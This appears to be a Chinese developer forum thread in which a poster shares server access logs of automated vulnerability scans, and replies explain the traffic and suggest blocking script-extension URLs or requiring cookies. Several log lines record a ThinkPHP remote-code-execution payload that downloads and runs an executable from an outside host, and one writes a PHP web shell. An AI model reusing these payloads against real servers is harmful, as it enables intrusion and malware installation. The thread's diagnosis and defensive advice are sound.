46.246.62.176 - - [12/Oct/2019:01:40:24 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 97
47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /elrekt.php HTTP/1.1" 404 97
106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /index.php HTTP/1.1" 404 97
139.162.88.63 - - [12/Oct/2019:18:06:31 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
106.14.152.42 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 -
139.162.88.63 - - [12/Oct/2019:19:39:00 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /elrekt.php HTTP/1.1" 404 97
222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /index.php HTTP/1.1" 404 97
1
lx0758 2019-10-21 13:59:45 +08:00
很明显,这是想扫描你的漏洞
|
2
Vegetable 2019-10-21 14:02:15 +08:00
这是热心人士在帮你进行服务器漏洞检查,一旦发现漏洞会通过黑掉你进行提醒.没什么特别好的办法屏蔽吧,我都是无视.
|
3
eason1874 2019-10-21 14:05:54 +08:00
挂马机的日常操作,扫描各种 CMS 和框架已经披露的漏洞。
教你个简单粗暴的方法,如果确定整站没有.php,.asp,.jsp 这些结尾的网址,那就直接把这些结尾的访问全部拒了。如果有呢,那用户访问先插 cookie 校验过 cookie 再允许访问,这样可以解决大部分,因为这种机器大多不会存 cookie 的。 |
4
xwbz2018 OP @lx0758 嗯,看出来是想搞事情,服务器是 Linux + Java,不会影响正常使用。。不过请问这种一般怎么处理的呢?
|